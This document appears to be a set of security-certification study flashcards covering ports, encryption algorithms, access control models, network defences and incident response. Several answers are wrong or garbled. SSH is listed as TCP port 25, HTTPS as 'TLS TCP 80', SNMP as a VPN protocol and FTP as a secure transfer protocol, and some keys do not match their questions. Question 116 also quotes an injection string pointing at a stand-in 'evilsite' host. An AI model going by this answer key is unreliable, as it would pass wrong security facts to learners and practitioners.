Technologies and Tools

Question 1

What mechanism of loop protection is based on an element in a protocol header ?

Answer 1

Time to live (TTL) is a value in the IP header used to prevent loops at Layer 3. The TTL value sets the max number of routers that an IP packet will transverse before it is discarded if it has not reached its intended destination.

Question 2

What type of wireless antenna can be used to send or receive signals in any direction ?

Answer 2

A rubber duck antenna is an omnidirectional antenna.

Question 3

What mechanism of wireless security is based on AES?

Answer 3

Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (CCMP) is based on the AES encryption scheme.

Question 4

What is the most effective means to reduce the risk of losing the data on a mobile device such as a notebook computer ?

Answer 4

Keeping minimal sensitive data on the system is the only way to reduce the risk.

Question 5

Which of the following is true regarding an exploitation framework? (Select all that apply)

A. Is a passive scanner
B. Fully exploits vulnerabilities
C. Only operates in an automated fashion
D. Allows for customisation of test elements
E. Represents additional risk to the environment
F. Can only assess systems over IPv4

Answer 5

B, D, E

Question 6

How are effective permissions determined or calculated ?

Answer 6

Accumulating the grants or allows of permissions, either thru group memberships or to the user accounts directly, and then removing any denials of permissions.

Question 7

What is an example of a PUP?

Answer 7

Potentially unwanted programs can include any type of questionable software such as sniffers, pw crackers, network mappers, port scanners, and vulnerability scanners.

Question 8

What is the purpose of DEP being present in an OS?

Answer 8

Data execution prevention is a memory security feature of many OS aimed at blocking a range of memory abuse attacks including buffer overflows. It blocks the execution of code stored in areas of memory designed as data only areas.

Question 9

Layer 7 of OSI model

Answer 9

Application layer

Question 10

Layer 6 of OSI model

Answer 10

Presentation layer

Question 11

Layer 5 of OSI model

Answer 11

Session later

Question 12

Layer 4 of OSI model

Answer 12

Transport layer

Question 13

Layer 3 of OSI model

Answer 13

Network layer

Question 14

Layer 2 of OSI model

Answer 14

Data link layer

Question 15

Layer 1 of OSI model

Answer 15

Physical layer

Question 16

FTP port

Answer 16

TCP ports 20 and 21

Question 17

SSH

Answer 17

TCP port 25

Question 18

SMTP

Answer 18

TCP port 25

Question 19

DNS

Answer 19

TCP and UDP port 53

Question 20

HTTP

Answer 20

TCP port 80

Question 21

POP3

Answer 21

TCP port 110

Question 22

NetBios Session Service

Answer 22

TCP port 139

Question 23

IMAP4

Answer 23

TCP port 143

Question 24

HTTPS

Answer 24

TCP Port 443 or TLS TCP 80

Question 25

Remote Desktop protocol (RDP)

Answer 25

TCP port 3389

Question 26

As the CTO Marge is implementing a security program. She has included security controls to address confidentiality and availability. Of the following choices what else should she include ?

1) ensure critical systems provide uninterrupted service
2) protect data in transit from unauthorised disclosure
3) endure systems are not susceptible to unauthorised changes
4) secure data to prevent unauthorised disclosure

Answer 26

c

The system in the example is already addressing confidentiality and availability.

Question 27

Which type of virtualisation allows a computers OS kernel to run multiple isolated instances of a guest virtual machine, with each guest sharing the kernel ?

1) container virtualisation
2) type 1 hypervisor virtualisation
3) type II hypervisor virtualisation
4) VDE

Answer 27

1.

Container based virtualization uses the same OS kernel of the host computer.

Question 28

Ned is reviewing pw security for employees of The Leftorium. The pw policy has the following settings:
The pw max age is 30 days
The pw min length is 14 characters
Pw cannot be reused until 5 other pw have been used
Pw must include at least one of the following four character types: uppercase letters, lowercase letters, numbers and special characters.

Ned discovers that despite having this pw policy in place users are still using the same pw that they were using more then a month ago. Which of the following actions will resolve this issue ?

Create a rule in the pw policy for the pw min age to be 7 days
Change the pw history to 10
Require the use of complex pw
Change the max age setting to 60 days

Answer 28

A

Question 29

Your org has decided to implement a biometric solution for authentication. One of the goals is to ensure that the biometric system is highly accurate. Which of the following provides the BEST indication of accuracy with the biometric system ?

The lowest possible FRR
The highest possible FAR
The lowest possible CER
The highest possible CER

Answer 29

A lower crossover error rate indicates a more accurate biometric system. The false acceptance rate and the false rejection rate vary based on the sensitivity of the biometric system and don’t indicate accuracy by themselves. A higher CER indicates a less accurate biometric system.

Question 30

Your org recently updated an online application employees use to log on when working from home.  Employees enter their username and pw into the application from their smartphone and the application logs their location using GPS. Which type of authentication is being used ?
A. One factor
B. Dual factor 
C. Something you are 
D. Somewhere you are

Answer 30

A

Question 31

A network includes a ticket granting ticket server used for authentication. Which authentication service does this network use ?

A. Shibboleth
B. SAML
C. LDAP
D. Kerberos

Answer 31

D

Question 32

Marge is reviewing an organizations account management processes. She wants to ensure that security log entries accurately report the id of personnel taking specific actions. Which of the following steps would BEST meet this requirement ?

A. Update ACLs for all files and folders
B. Implement role based privileges
C. Use an SSO solution
D. Remove all shared accounts

Answer 32

D

Question 33

A recent security audit discovered several apparently dormant user accounts. Although users could log on to the accounts no one has logged on to them over 60 days. You later discovers that these accounts are for contractors who work approx one week every quarter. Which of the following is the BEST response to this situation ?

A. Remove the account expiration from the accounts
B. Delete the accounts
C. Reset the accounts
D. Disable the accounts

Answer 33

D

Question 34

Members of a project team chose to meet at a local library to complete some work on a key project. All of them are authorised to work from home using a VPN connection and have connected from home successfully. However they found they were unable to connect to the network using the VPN from the library and they could not access any of the project data. Which of the following choices is the MOST likely reason why they can’t access this data ?

A. Role based access control
B. Time of day access control
C. Location based policy
D. Discretionary access control

Answer 34

C

Question 35

A company recently hired you as a security admin. You notice that some former accounts used by temp employees are currently enabled. Which of the following choices is the BEST RESPONSE

A. Disable all the temp accounts
B. Disable the temp accounts you’ve noticed are enabled
C. Craft a script to id inactive accounts based on the last time they logged on
D. Set account expiration dates for all accounts when creating them

Answer 35

C

Question 36

Developers are planning to develop an application using role based access control. Which of the following would they MOST likely include in their planning ?
A. A listing of labels reflecting classification levels
B. A requirements list identifying need to know
C. A listing of owners
D. A matrix of functions matched with their required privileges

Answer 36

D

Question 37

A security admin needs to implement an access control system that will protect data based on the following matrix.

Doc type - security level - security label
Emp docs - private - employee
Salary & compensation docs - private - payroll
Internal phone listing docs - private - employee

Which of the following models is the admin implementing ?

A. DAC
B. MAC
C. Role-BAC
D. ABAC

Answer 37

B

This is a mandatory access control model. You can tell because it is using security labels.

A Discretionary access control model has an owner who establishes access for the objects. A role based access control model uses roles or groups to assign rights and permissions. An attribute based access control model uses attributes assigned to subjects and objects within a policy to grant access.

Question 38

Which of the following allows the deployment of a publicly accessible web server without compromising the security of the private network ?
A. Intranet
B. DMZ
C. Extranet
D. Switch

Answer 38

B. A DMZ provides a network segment where publicly accessible servers can be deployed without compromising the security of the private network.

Question 39

A security template can be used to perform all but which of the following tasks ?

A. Capture the security configuration of a master system.
B. Apply security settings to a target system
C. Return a target system to its precompromised state
D. Evaluate compliance with security of a target system

Answer 39

C

Question 40

In order to avoid creating a monolithic security structure, organizations should adopt a wide range of security mechanisms. This concept is known as 
A. Defense in depth
B. Control diversity 
C. Intranet buffering 
D. Sandboxing

Answer 40

B

Question 41

When offering a resource to public users, what means of deployment provides the most protection for a private network ?
A. Intranet
B. Wireless
C. Honeynet
D. DMZ

Answer 41

D

Question 42

When you are implementing a security monitoring system, what element is deployed in order to detect and record activities and events ?

A. Correlation engine
B. Tap
C. Sensor
D. Aggregation switch

Answer 42

C

Question 43

What form of cloud service provides the customer with the ability to run their own custom code but does not require that they manage the execution environment or operating system ?

A. SaaS
B. PaaS
C. IaaS
D. SECaas

Answer 43

B. Platform as a Service is the concept of providing a computing platform and SW solution stack to a virtual or cloud based service.

Question 44

Marge needs to collect network device config info and network statistics from devices on the network. She wants to protect the confidentiality of credentials used to connect to these devices. Which of the following protocols would BEST meet this need ?

A. SSH
B. FTPS
C. SNMPv3
D. TLS

Answer 44

C. Simple Network Mgmt Protocol v3 is a secure protocol that can monitor and collect info from network devices and includes strong auth mechanisms to protect the confidentiality of credentials.

Question 45

Your org wants to increase security for VoIP and video teleconferencing apps used within the network. Which of the following protocols will BEST support this goal ?

A. SMTP
B. TLS
C. SFTP
D. SRTP

Answer 45

D. The secure real time transport protocol provides encryption, message auth, and integrity for VoIP, video teleconferencing, and other streaming media apps.

Question 46

Mgmt within your org wants to ensure that switches are not susceptible to switching loop problems. Which of the following protocols is BEST choice to meet this need ?

A. Flood guard
B. SNMPv3
C. SRTP
D. RSTP

Answer 46

D. Rapid STP prevents switching loop problems and should be enabled on the switches to meet this need.

Question 47

A network tech incorrectly wired switch connections in your orgs network. It effectively disabled the switch as tho it was a victim of a DoS attack. Which of the following should be done to prevent this situation in the future ?

A. Install an IDS
B. Only use layer 2 switches
C. Install SNMPv3 on the switches
D. Implement STP or RSTP

Answer 47

D

Spanning tree protocol and rapid STP both percent switching loop problems.

Question 48

You manage a Linux computer used for security within your network you plan to use it to inspect and handle network based traffic using iptables. Which of the following network devices can this replace ?

A. Wireless access point
B. Firewall
C. Layer 2 switch
D. Bridge

Answer 48

B

Iptables include settings used by the Linux kernel firewall and can be used to replace a firewall.

Question 49

You need to implement antispoofing on a border router. Which one of the following choices will BEST meet this goal ?

A. Create rules to block all outgoing traffic from a private IP address
B. Implement a flood guard on switches
C. Add a web app firewall
D. Create rules to block all incoming traffic from a private IP address

Answer 49

D
You would create rules to block all incoming traffic from private IP addresses. The border router is between the internal network and the internet and any traffic coming from the internet with a private IP address is a spoofed source IP address.

Question 50

An org has recently had several attacks against servers within a DMZ. Security admin discovered that many of these attacks are using TCP but they did not start with a three way handshake. Which of the following devices provides the BEST solution ?

A. Stateless firewall
B. Stateful firewall
C. Network firewall
D. App based firewall

Answer 50

B.
A stateful firewall filters traffic based on the state of a packet within a session. It would filter a packet that isn’t part of a TCP three way handshake. A stateless firewall filters traffic based on the IP address, port, or protocol ID. While it’s appropriate to place a network firewall in a DMZ a network firewall could be either a stateless or a stateful firewall. An app based firewall is typically only protecting a host not a network.

Question 51

Your org hosts a web server and wants to increase its security. You need to separate all web facing traffic from internal network traffic. Which of the following provides the BEST solution?

A. DMZ
B. VLAN
C. Firewall
D. WAF

Answer 51

A

Question 52

Mgmt at your org wants to prevent employees from accessing social media sites using company owned computers. Which of the following devices would you implement ?

A. Transparent proxy
B. Reverse proxy
C. Nontransparent proxy
D. Caching proxy

Answer 52

C. A nontransparent proxy includes the ability to filter traffic based on the URL and is the best choice.

Question 53

You need to configure a UTM security appliance to restrict traffic going to social media sites. Which of the following are you MOST likely to configure ?

A. Content inspection
B. Malware inspection
C. URL filter
D. DDoS mitigator

Answer 53

C
You would most likely configure the URL filter on the unified threat management security appliance. This would block access to the peer to peer sites based on their URL.

Question 54

What method of access control is best suited for environments with a high rate of employee turnover?
A. MAC
B. DAC
C. RBAC
D. ACL

Answer 54

C. Role based access control is best suited for environments with a high rate of employee turnover because access is defined against static job descriptions rather then transitive used accounts (DAC and ACL) or assigned clearances (MAC).

Question 55

Which of the following technologies can be used to add an additional layer of protection between a directory services based network and remote clients?

A. SMTP
B. RADIUS
C. PGP
D. VLAN

Answer 55

RADIUS is a centralized authentication solution that adds an additional layer of security between a network and remote clients. SMTP is the email forwarding protocol used on the internet and intranets. PGP is a security solution for email. VLANS are created by switches to logically divide a network into subnets.

Question 56

How are effective permissions calculated?

A. Count the number of allows, subtract the number of denials
B. Accumulate allows, remove denials
C. Look at the users clearance level
D. Count the number of groups the user is a member of

Answer 56

B. Effective permissions are calculated by accumulating all allows or grants of access to a resource, and then subtracting or removing any denials to that resource.

Question 57

Failing to perform regular permissions auditing can result in a violation of what security concept ?

A. Implicit deny
B. Security by obscurity
C. Least privilege
D. Diversity of defense

Answer 57

Failing to regularly audit user permissions can result in users gaining more access over time that is not required by their current work responsibilities. This situation is a violation of the principle of least privilege.

Question 58

Attackers have recently launched several attacks against servers in your organization’s DMZ. You are tasked with identifying a solution that will have the best chance at preventing these attacks in the future. Which is the best choice 
A. An out of band IPS
B. An in band IPS
C. A passive IDS
D. An out of band IDS

Answer 58

The best solution is an in band intrusion prevention system. Traffic goes thru the IPS and the IPS has the best chance of preventing attacks from reaching internal systems. An IPS is in and not out of band. An IDS is passive and not in band so it can only detect and react to the attacks not block them.

Question 59

Lisa oversees and monitors processes at a water treatment plant using SCADA systems. Administrators recently discovered malware on her system that was connecting to the SCADA systems. Although they removed the malware management is still concerned. Lisa needs to continue using her system and it’s not possible to update the SCADA systems. Which of the following can mitigate this risk ?

A. Install HIPS on the SCADA systems
B. Install a firewall on the border of the SCADA network
C. Install a NIPS on the border of the SCADA network
D. Install a honeypot on the SCADA network

Answer 59

C. A network intrusion prevention system installed on the supervisory control and data acquisition network can intercept malicious traffic coming into the network and is the best choice. The scenario states you cannot update the SCADA systems so you cannot install a host based IPS on any of them. A firewall provides a level of protection. However it wouldn’t be able to differentiate between valid traffic sent by Lisa and malicious traffic sent by malware from Lisa’s system. A honeypot might be useful to observe malicious traffic but wouldn’t prevent it.

Question 60

Your wireless network includes one centralized AP that you configure. This AP forwards the configuration to other APs in your wireless network. Which of the following best describes these APs?

A. The centralized AP is a stand alone AP and it configures fat APs in your network.
B. The centralized AP is a thin AP and it configures fat APs in your network.
C. The centralized AP is a controller based AP and it configures stand alone APs in your network
D. The centralized AP is a fat AP and it configures thin APs in your network.

Answer 60

D. The centralized AP is a fat AP and it configures thin APs in the network. The fat AP could also be called a stand alone intelligent or autonomous AP and it is used to configure thin APs not fat APs. Thin APs do not configure other APs. Stand alone APs are not configured by other APs.

Question 61

You are the security manager for a brokage firm. New company policy requires that all admin be evaluated for compliance or violations in regard to adherence to the security policy and ethics agreement. Which of the following is a technique that can be used to accomplish this task ?

A. Separation of duties
B. Clean desk
C. Background checks
D. Mandatory vacations

Answer 61

D

Question 62

You are the network manager for a large organization. Over the weekend a storm caused a power surge which damaged the main router between the company network and the internet service. On Monday morning you realize that the entire intranet is unable to connect to any outside resource and mission critical tasks are not functioning. What is the problem that the org is experiencing ?

A. Sustained redundancy
B. Maintaining of avail
C. Load balanced distribution of job tasks
D. A single point of failure

Answer 62

D

Question 63

You are the security manager for a large org. During the yearly risk management reassessment a specific risk is being left as is. You thoroughly document the information regarding the risk the related assets and the potential consequences. What is this method of addressing risk known as ?

A. Mitigation
B. Tolerance
C. Assignment
D. Ignoring

Answer 63

B tolerance = accepting risk

Question 64

What type of security policy or plan has the following main phases :
Preparation 
Identification 
Containment 
Eradication 
Recovery
Lessons learned 

A. IRP
B. BCP
C. DRP
D. BPA

Answer 64

A incident response plan

Question 65

Which of the following are important elements in gathering data from storage devices related to a suspects system during a forensic investigation ?

A. Calculating a hash of the original storage device
B. Creating bitstream copy clones of the original
C. Using read-block adaptors
D. Removing the storage device from the suspects system

Answer 65

A
B
D

Question 66

A corrective control is used for what purpose

A. To thwart or stop unwanted or unauthorized activities from occurring
B. To discover or detect unwanted or unauthorized activity
C. To modify the environment to return systems to normal after an unwanted or unauthorized activity has occurred
D. To provide various options to other existing controls to aid in enforcement and support of security policies

Answer 66

C

Question 67

Which of the following may be considered protected health information ?

A. Phone number 
B. Medical record number 
C. Email address 
D. Vehicle ids 
E. Web URLS
F. IP address numbers 
G. Biometric ID
H. Photographic images

Answer 67

All

Question 68

An org has a critical SCADA network it is using to manage a water treatment plant for a large city. Availability of this system is important. Which of the following security controls would be most relevant to protect this system?

A. DLP
B. TPM
C. EMP
D. NIPS

Answer 68

D

Question 69

Bizzfad is planning to implement a CYOD deployment model. You’re asked to provide input for the new policy. Which of the following concepts are appropriate for this policy ?

A. SCADA access
B. Storage segmentation
C. Database security
D. Embedded RTOS

Answer 69

B storage segmentation creates separate storage areas in mobile devices

Question 70

A new mobile device security policy has authorized the use of employee owned devices but mandates additional security controls to protect them if they are lost or stolen. Which of the following meets this goal ?

A. Screen locks and GPS tagging
B. Patch management and change management
C. Screen locks and device encryption
D. Full device encryption and IaaS

Answer 70

C

Infrastructure as a service is a cloud computing option so not correct.

Question 71

Mgmt within your company wants to implement a method that will authorize employees based on several elements including the employees identity location time of day and type of device used by the employee. Which of the following will meet this need ?

A. Geofence
B. Containerization
C. Tethering
D. Context aware authentication

Answer 71

D
Context aware authentication can authenticate a user and a mobile device using multiple elements including identity geolocation time of day and type of device

Question 72

AES

Answer 72

Advanced Encryption Standard
Key size 128, 192, 256
Uses single shared key between sender and receiver (symmetric)
Best choice out there for security

Question 73

3DES

Answer 73

Triple data encryption standard
Key size 168
Not secure since AES
3 encryption operations

Question 74

DES

Answer 74

Data encryption standard
Key size 56
Easily cracked
Has 5 different modes

Question 75

IDEA

Answer 75

International data encryption algorithm

Key size 128

Question 76

Blowfish

Answer 76

Keysize 32 - 448
Faster algorithm then idea and des
Must use at least 128 bits to be secure

Question 77

Twofish

Answer 77

Keysize 128, 192, 256

Equivalent to AES

Question 78

RC5

Answer 78

Rivest Cipher 5

Key size 0-2040

Question 79

RC6

Answer 79

Rivest Cipher 6

Key size 128, 192, 256

Question 80

CAST-128

Answer 80

Carlisle Adams/stafford Tavares

40 - 128 in increments of 8

Question 81

Dr. Terwilliger installed code designed to run if he ever lost his job as a sidekick on a television show. The code will create a new account with credentials that only he knows three days after his original account is deleted. Which type of account does this code create?

A. Backdoor
B. Logic bomb
C. Root kit
D. Ransomware

Answer 81

A

The logic bomb is a malware type not the type of account he created.

Question 82

Security administrators recently discovered suspicious activity from within your network. After investigating the activity they discovered malicious traffic from outside your network connecting to a server within your network. They determined that a malicious threat actor used this connection to install malware on the server and the malware is collecting data and sending it out of the network. Which of the following BEST describes the type of malware used by the threat actor ?

A. APT
B. Organized crime
C. RAT
D. Crypto malware

Answer 82

C

Remote access Trojan that allows attackers to take control of systems from remote locations

Question 83

The CEO of a company recently received an email. The email indicates that her company is being sued and named her specifically as a defendant in the lawsuit. It includes an attachment and the email describes the attachment as a subpoena. Which of the following BEST describes the social engineering principle used by the sender in this scenario ?

A. Whaling
B. Phishing
C. Consensus
D. Authority

Answer 83

D

The sender is using the social engineering principle of authority in this scenario.

Question 84

An attacker has captured a database filled w hashes of randomly generated passwords. Which of the following attacks is MOST likely to crack the largest number of passwords in the database ?

A. Dictionary attack
B. Birthday attack
C. Brute force attack
D. Rainbow tables

Answer 84

D
A rainbow table attack attempts to discover the pw from the hash. However they use rainbow tables which are huge databases of precomputed hashes.

Question 85

Martin is performing a risk assessment on an ecommerce web server. While doing so he created a doc showing all the known risks to this server along with the risk score for each risk. What is the name of this document ?

A. Quantitative risk assessment
B. Qualitative risk assessment
C. Residual risk
D. Risk register

Answer 85

D
A risk register lists all known risks for an asset, such as a web server, and it typically includes a risk score (the combination of the likelihood of occurrence and the impact of the risk).

Question 86

Your org has a legacy server running within the DMZ. It is running older software that is not compatible with current patches so management has decided to let it remain unpatched. Management wants to know if attackers can access the internal network if they successfully compromise this server. Which of the following is the MOST appropriate action ?

A. Perform a vulnerability scan
B. Perform a port scan
C. Perform a black box test
D. Perform a penetration test

Answer 86

D
A penetration test attempts to exploit a vulnerability and can determine if a successful attack will allow attackers into the internal network.

Question 87

You are troubleshooting issues between two servers on your network and need to analyze the network traffic. Of the following choices what is the BEST tool to capture and analyze this traffic ?

A. Network mapper
B. Protocol analyzer
C. Network scanner
D. SIEM

Answer 87

B

A protocol analyzer is the best choice to capture and analyze network traffic.

Question 88

You suspect someone has been trying a brute force pw attack on a Linux system. Which of the following logs should you check to view failed authentication attempts by users ?

A. /var/log/btmp
B. /var/log/fail
C. /var/log/httpd
D. /var/log/kern

Answer 88

A

The /var/log/btmp log contains information on user failed login attempts.

Question 89

Your org is planning to deploy a new ecommerce web site. Management anticipates heavy processing requirements for a back end application. The current design will use one web server and multiple application servers. Which of the following Best describes the application servers ?

A. Load balancing
B. Clustering
C. RAID
D. Affinity scheduling

Answer 89

A
The design is using load balancing to spread the load across multiple application servers. The scenario indicates the goal is to use multiple servers because of the heavy processing requirements and this is exactly what load balancing does.

Question 90

Your backup policy for a db server dictates that the amount of time needed to perform backups should be minimized. Which of the following backup plans would best meet this need ?

A. Full backups on Sunday and full backups on the other six days of the week
B. Full backups on Sunday and differential backups on the other six days of the week
C. Full backups on Sunday and incremental backups on the other six days of the week
D. Differential backups on Sunday and incremental backups on the other six days of the week.

Answer 90

C
A full/incremental backup strategy is the best option with one full backup on one day and incremental backups on the other days. The incremental backups will take a relatively short time compared with the other methods. A full backup every day would require the most time every day. Differential backups become steadily larger as the week progresses and take more time to back up than incremental backups. Backups must start with a full backup so a differential/incremental backup strategy is not possible

Question 91

A security expert at your org is leading an on site meeting with key disaster recovery personnel. The purpose of the meeting is to perform a test. Which of the following BEST describes this test ?

A. Functional exercise
B. Full blown test
C. Tabletop exercise
D. Simulation to perform steps of a plan

Answer 91

C
A tabletop exercise is discussion based and is typically performed in a classroom setting. Because this is a meeting that includes disaster recovery personnel it is a tabletop exercise.

Question 92

An app developer is working on the cryptographic elements of an application. Which of the following Cipher modes should NOT be used in this application?

A. CBC
B. CTM
C. ECB
D. GCM

Answer 92

C
The electronic code book mode of operation encrypts blocks with the same key making it easier for attackers to crack. The other Cipher modes are secure and can be used. Cipher block chaining mode is used by some symmetric block ciphers though it isn’t as efficient. Counter mode combines into an initialization vector with a counter and effectively converts a block Cipher into a stream Cipher. Galois counter mode combined the counter mode with hashing techniques for data authenticity and confidentiality.

Question 93

The following text shows the ciphertext result of encrypting the word “passed” with an uppercase P and a lowercase p:

Passed! - xnBKcndl+25mHjnafwi6Jw
passed! - RqMbHJqLdPE3RCuUU17FtA

Which of the following best describes the cryptography concept demonstrated by comparing the resulting ciphertext of both words ?

A. Confusion
B. Diffusion
C. Key stretching
D. Security through obscurity

Answer 93

B
This demonstrates diffusion because a small change in the plaintext results in a large change in the Cipher text. Confusion indicates that the ciphertext is significantly different then the plaintext. Although this is true for both results the question is asking you to compare the two results. Key stretching techniques add salt to pw before hashing them to thwart pw cracking attacks. Security thru obscurity methods use obfuscation methods to hide data but they don’t necessarily encrypt data.

Question 94

Bart wants to send a secure email to Lisa so he decides to encrypt it. BART wants to ensure that Lisa can verify that he sent it. Which of the following does Lisa need to meet this requirement ?

A. Bart’s public key
B. Bart’s private key
C. Lisa’s public key
D. Lisa’s private key

Answer 94

A
Lisa would decrypt the digital signature with Bart’s public key and verify the public key is valid by querying a CA. The digital signature provides verification that Bart sent the message, non repudiation and integrity for the message.

Question 95

App developers are creating an application that requires users to log on with strong pw. The developers want to store the pw in such a way that it will thwart brute force attacks. Which of the following is the BEST solution?

A. 3DES
B. MD5
C. PBKDF2
D. Database fields

Answer 95

C
Password based key derivation function 2 is a key stretching technique designed to protect brute force attempts and is the best choice.

Question 96

An organization recently updated its security policy. One change is a requirement for all internal web servers to only support HTTPS traffic. However the organization does not have funds to pay for this. Which of the following is the best solution?

A. Create code signing certificates for the web servers
B. Create one wildcard certificate for all the web servers
C. Create a public CA and issue certificates from it
D. Create certificates signed by an internal private CA.

Answer 96

D
The best solution is to use certificates signed by an internal private CA. This ensures connections use HTTPS instead of HTTP. Even if the org does not have an internal CA it is possible to create one on an existing server without incurring any additional costs.

Question 97

Management within your organization wants to ensure that users understand the rules of behavior when they access the organization’s computer systems and networks. Which of the following best describes what they would implement to meet this requirement?

A. AUP
B. NDA
C. BYOD
D. DD

Answer 97

A
An acceptable use policy informs users of company expectations when they use computer systems and networks and it defines acceptable rules of behavior.

Question 98

After a major data breach Lisa has been tasked with reviewing security policies related to data loss. Which of the following is most closely related to data loss ?

A. Clean desk policy
B. Legal hold policy
C. Job rotation policy
D. Background check policy

Answer 98

A

A clean desk policy requires users to organize their areas to reduce the risk of possible data theft and pw compromise.

Question 99

Which of the following is most directly associated with providing or supporting perfect forward secrecy?

A. PBKDF2
B. ECDHE
C. HMAC
D. OCSP

Answer 99

B
Elliptic curve diffie Hellman ephemeral implements perfect forward secrecy through the use of elliptic curve cryptography.

Question 100

Which of the following symmetric encryption algorithms offers the strength of 168-bit keys ?

A. Data encryption standard
B. Advanced Encryption Standard
C. Triple DES
D. IDEA

Answer 100

Triple DES offers the strength of 168-bit keys.

Question 101

The security service that protects the secrecy of data, info, or resources is known as what ?

A. Integrity
B. Authentication
C. Nonrepudiation
D. Confidentiality

Answer 101

D.

The security service that protects the secrecy of data, info, or resources is known as confidentiality.

Question 102

When a subject or end user requests a certificate they must provide which of the following items ?

A. Proof of identity
B. A hardware storage device
C. A public key
D. A private key

Answer 102

A, C
Proof of iD and the subjects public key must be provided to the CA when the subject requests a certificate. The private key should never be revealed to anybody.

Question 103

You are the communications officer for a large organisation. Your data transfer system encrypts each file before sending it across the network to the recipient. There have been issues with the keys being intercepted as they are sent along the same path as the protect files. What alternative system should be used for key exchange ?

A. Ephemeral
B. Out of band
C. Sequential
D. Synchronised

Answer 103

B
Out of band key exchange takes place outside of the current communication channel or pathway, such as through a secondary channel, via a special secured exchange technique in the channel, or with a complete separate pathway technology.

Question 104

What is the results of the following calculation: 10010011+00011100

A. 10011111
B. 00010000
C. 01110000
D. 10001111

Answer 104

D

XOR is an exclusive disjunction which means that it produces an output of truth (or 1) whenever the two inputs differ.

Question 105

What form of wireless can use a RADIUS server to authenticate a wireless client ?

A. WEP
B. WPA PSK
C. WPA-2 ENT
D. WPS

Answer 105

C
WPA and WPA-2 support two forms of authentication: PSK and ENT. PSK is also known as personal. PSK is the use of a static fixed pw for authentication. ENT is also known as iEEE 802.1 EAP. ENT enables the leveraging of an existing AAA service such as RADIUS.

Question 106

What type of cert will enable an organisation to verify 6 specific subdomains with a single cert but not allow other sub domains to be included ?

A. Wildcard
B. SAN
C. Root
D. Domain validation

Answer 106

B
SAN certs support a range of names for a single entity. A SAN certificate is used to provide authentication to multiple names but only those that are specifically defined.

Question 107

FTP/S uses which of the following TCP ports by default ?

A. 20 and 21
B. 139 and 445
C. 443 and 22
D. 989 and 990

Answer 107

D

Question 108

The chief information security officer has mandated that all IT systems with credit card data he segregated from the main corporate network to prevent unauthorized access and that access to the IT systems should be logged. Which of the following would BEST meet the CISOs requirements?

A. Sniffers
B. NIDS
C. Firewalls
D. Web proxies
E. Layer 2 switches

Answer 108

C

Question 109

Which of the following would Jane, an admin, use to detect and unknown security vulnerability?

A. Patch management
B. Application fuzzing
C. IDbadge
D. Application configuration baseline

Answer 109

B

Question 110

After a new firewall has been installed devices cannot obtain a new IP address. Which of the following ports should Matt open on the firewall?

A. 25
B. 68
C. 80
D. 443

Answer 110

B

Question 111

Which of the following is a requirement when implementing PKI of data loss is unacceptable?

A. Web of trust
B. Non repudiation
C. Key escrow
D. Certificate revocation list

Answer 111

C

Question 112

Which of the following are restricted to 64-bit block sizes ? Pick two.

A. PGP
B. DES
C. AES256
D. RSA
E. 3DES
F. AES

Answer 112

B and E

Question 113

Matt has been tasked with separating network traffic between virtual machines on a single hypervisor. Which of the following would he implement to best address this requirement? Select two

A. Virtual switch
B. NAT
C. System partitioning 
D. Access list 
E. Disable spanning tree 
F. VLAN

Answer 113

A and F

Question 114

A company recently implemented a TLS on their network. The company is most concerned with

A. Confidentiality
B. Availability
C. Integrity
D. Accessibility

Answer 114

A

Question 115

Which of the following wireless security technologies continually supplies new keys for WEP?

A. TKIP
B. Mac filtering
C. WPA2
D. WPA

Answer 115

A

Question 116

Pete has been notified by the IDS that the company website is under attack. Analysis of the web logs show the following string, indicating a user is trying to post a comment on the public bulletin board.

INSERT INTO message ‘source=http://evilsite

This is an example of which of the following ?

A. XSS attack
B. XML injection attack
C. Buffer overflow attack
D. SQL injection attack

Answer 116

A

Question 117

A security analyst implemented group based privileges within the company active directory. Which of the following account management techniques should be undertaken regularly to ensure least privilege principles ?

A. Leverage role based access controls
B. Perform user group clean up
C. Verify smart card access controls
D. Verify SHA 256 for password hashes

Answer 117

B

Question 118

One of the servers on the network stops responding due to lack of available memory. Server administrators did not have a clear definition of what action should have taken place based on the available memory. Which of the following would have best kept this incident from occurring ?

A. Set up a protocol analyzer
B. Set up a performance baseline
C. Review the systems monitor on a monthly basis
D. Review the performance monitor on a monthly basis.

Answer 118

B

Question 119

Which of the following uses both a public and a private key ?

A. RSA
B. AES
C. MD5
D. SHA

Answer 119

A

Question 120

Matt wants to protect a newly built server from zero day attacks. Which of the following would provide the best level of protection ?

A. HIPS
B. Antivirus
C. NIDS
D. ACL

Answer 120

A

Question 121

During an anonymous penetration test Jane, a system admin, was able to identify a shared print spool directory and was able to download a doc from the spool. Which statement Best describes her privileges?

A. All users have write access to the directory
B. Jane has read access to the file
C. All users have read access to the file
D. Jane has read access to the directory

Answer 121

C

Question 122

Which of the following are used to implement VPNs? Select two

A. SFTP
B. IPSec
C. HTTPS
D. SNMP
E. SSL

Answer 122

B and D

Question 123

A security engineer is given new application extensions each month that need to be secured prior to implementation. They do not want the new extensions to invalidate or interfere with existing application security. Additionally the engineer wants to ensure that the new requirements are approved by the appropriate personnel. Which of the following should be in place to meet these two goals ?

A. Patch audit policy 
B. Change control policy 
C. Incident management policy
D. Regression testing policy 
E. Escalation policy
F. Application audit policy

Answer 123

B and D

Question 124

A computer is put into a restricted VLAN until the computers virus definitions are up to date. Which of the following best describes this system type ?

A. NAT
B. NIPS
C. NAC
D. DMZ

Answer 124

C

Question 125

An IT security technician is actively involved in identifying coding issues for her company. Which of the following is an application security technique that can be used to identify unknown weaknesses within the code ?

A. Vulnerability scanning
B. Denial of service
C. Fuzzing
D. Port scanning

Answer 125

C

Question 126

A Unix admin would like to use native commands to provide a secure way of connecting to other devices remotely and to securely transfer files. Which of the following protocols could be utilized ? Select two.

A. RDP
B. SNMP
C. FTP
D. SCP
E. SSH

Answer 126

C and E

Question 127

Which of the following types of logs could provide clues that someone has been attempting to compromise the SQL server database ?

A. Event
B. SQL log
C. Security
D. Access

Answer 127

A

Question 128

Which of the following application security principles involves inputting random data into a program?

A. Brute force attack
B. Sniffing
C. Fuzzing
D. Buffer overflow

Answer 128

C

Question 129

Sara a security admin is noticing a slow down in the wireless network response. She launched a wireless sniffer and sees a large number of ARP packets being sent to the AP. Which of the following type of attacks is underway ?

A. IV attack
B. Interference
C. Blue jacking
D. Packet sniffing

Answer 129

A

Question 130

A security technician needs to open ports on a firewall to allow for domain name resolution. Which of the following ports should be open ?
Select two.

TCP 21
TCP 23
TCP 53
UDP 23
UDP 53

Answer 130

TCP 53

UDP 53

